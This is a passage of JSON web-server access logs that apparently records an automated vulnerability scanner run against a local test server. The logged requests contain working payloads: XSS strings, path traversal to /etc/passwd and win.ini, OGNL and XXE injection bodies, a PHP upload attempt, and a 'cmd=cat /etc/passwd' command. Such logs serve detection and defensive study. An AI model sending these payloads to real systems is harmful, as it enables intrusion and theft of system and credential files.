"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /template/custom/content-editor HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysmgmt/2015/bmc/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /store/app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Orion/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_up.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?destpage=\x22&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-requests-log.http HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/29K6BVsANDdl21Y7VNiZs7mZMXS/)%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229K6Bg7VlfLiyBLsoQO67ssXzaB.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29K6Bg7VlfLiyBLsoQO67ssXzaB&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seo/seopanel/login.php?sec=forgot HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plc/webvisu.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"--29K6Bgj1gtV2WKiivWHHMM9MpKT\x0D\x0AContent-Disposition: form-data; name=\x2229K6BjTUxXxAbCqeFbjrNaXrO6G\x22; filename=\x2229K6BfaFcxaHX3ZWYVKJcv74e4S.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A ALttP\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 12345\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29K6Bgj1gtV2WKiivWHHMM9MpKT\x0D\x0AContent-Disposition: form-data; name=\x2229K6BeyCCSyWDiJJsW9XjLHIfmu\x22; filename=\x2229K6BiV3YK6Cp91dutQqNZDDy3s.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A ]>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A &xxe;\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29K6Bgj1gtV2WKiivWHHMM9MpKT--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /XMLCHART HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alfresco/api/-default-/public/cmis/versions/1.1/atom HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; 